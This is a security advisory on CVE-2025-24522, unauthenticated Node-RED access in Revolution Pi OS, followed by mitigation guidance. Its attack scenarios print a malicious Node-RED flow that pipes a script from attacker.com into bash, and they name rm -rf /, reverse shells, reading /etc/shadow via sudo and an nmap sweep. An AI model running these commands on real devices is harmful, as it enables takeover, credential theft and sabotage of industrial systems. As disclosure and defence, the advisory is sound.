Critical Vulnerability in KUNBUS Revolution Pi OS
Overview
A critical security vulnerability, CVE-2025-24522, has been identified in KUNBUS Revolution Pi OS Bookworm (01/2025 release). The flaw is missing authentication on the Node-RED server shipped with the OS: an unauthenticated attacker who can reach the Node-RED editor can take full control of the Node-RED instance and execute arbitrary commands on the underlying operating system.
With a CVSS v4 base score (CVSS-B) of 9.3 (CRITICAL), this vulnerability poses a severe risk to industrial systems and IoT deployments using Revolution Pi devices. (Published: 05/01/2025)
Technical Details
Root Cause
The Node-RED instance in Revolution Pi OS does not enforce authentication by default, meaning:
The Node-RED editor and its admin API (TCP port 1880) are reachable without credentials.
Anyone who can reach the port can inject new flows, modify existing ones, or run operating-system commands through Node-RED nodes such as "exec".
Commands started this way run with the privileges of the Node-RED process; where that account can use sudo, this leads to full system compromise.
Affected Versions
KUNBUS Revolution Pi OS Bookworm (01/2025 release)
Earlier versions may also be vulnerable if Node-RED was not manually secured.
Attack Scenarios
Scenario 1: Remote Exploitation via Exposed Node-RED Dashboard
Discovery: An attacker scans the local network, or internet-facing Revolution Pi devices, and finds an exposed Node-RED editor at http://<target-ip>:1880.
Unauthenticated Access: Since no authentication is required, the attacker opens the Node-RED editor directly.
Malicious Flow Injection: The attacker creates a new flow with an "exec" node configured to run OS commands (e.g., rm -rf /, wget malware.sh, or a reverse shell). Example malicious flow, as it appears in a flow export:

    [
      {
        "id": "inject-node",
        "type": "inject",
        "payload": "malicious_command",
        "wires": [["exec-node"]]
      },
      {
        "id": "exec-node",
        "type": "exec",
        "command": "sh -c 'curl http://attacker.com/malware.sh | bash'",
        "addpay": false,
        "wires": []
      }
    ]

Deployment & Execution: The attacker deploys the flow and triggers the inject node, which executes the command on the Revolution Pi.
The attacker gains remote shell access, exfiltrates data, or disrupts operations.
Scenario 2: Lateral Movement in Industrial Networks
Initial Access: An attacker compromises a weakly secured Revolution Pi in a factory network through the unauthenticated Node-RED editor.
Privilege Escalation: Using an exec node in Node-RED, the attacker runs:

    sudo -n id            # check for passwordless sudo; uid=0 in the output means root
    sudo cat /etc/shadow  # extract password hashes for offline cracking

Pivoting: The attacker scans internal networks from the device (e.g. nmap -sn 192.168.1.0/24) and exploits other hosts it can reach. From there they deploy ransomware or sabotage industrial processes.
Mitigation & Fixes
Immediate Actions
Enable Node-RED Authentication:
Edit /home/pi/.node-red/settings.js and set:

    adminAuth: {
        type: "credentials",
        users: [{
            username: "admin",
            password: "$2a$08$hashed_password",
            permissions: "*"
        }]
    }

Generate the bcrypt hash to paste into the password field with:

    node-red-admin hash-pw

(node-red admin hash-pw works as well where the admin CLI is bundled with the Node-RED install). Restart Node-RED afterwards; the editor and admin API only enforce adminAuth after the settings file has been reloaded.
Restrict Network Access: Use a firewall to block unauthorized access to port 1880. Example (ufw); note that ufw evaluates rules in the order they were added and stops at the first match, so the allow rule for the trusted subnet must be added before the deny rule, otherwise the deny matches first and blocks everyone:

    sudo ufw allow from 192.168.1.0/24 to any port 1880
    sudo ufw deny 1880
Update Revolution Pi OS:
Check for patches from KUNBUS and apply them immediately.
Long-Term Best Practices
Disable Node-RED if unused.
Monitor for suspicious flows (e.g., unexpected exec nodes).
Segment industrial networks to prevent lateral movement.
Conclusion
CVE-2025-24522 is a critical vulnerability that exposes Revolution Pi devices to remote code execution (RCE) due to missing Node-RED authentication. Attackers can take full control of affected systems, making this a high-priority issue for industrial and IoT environments.
Recommendation: Apply mitigations immediately and monitor for updates from KUNBUS.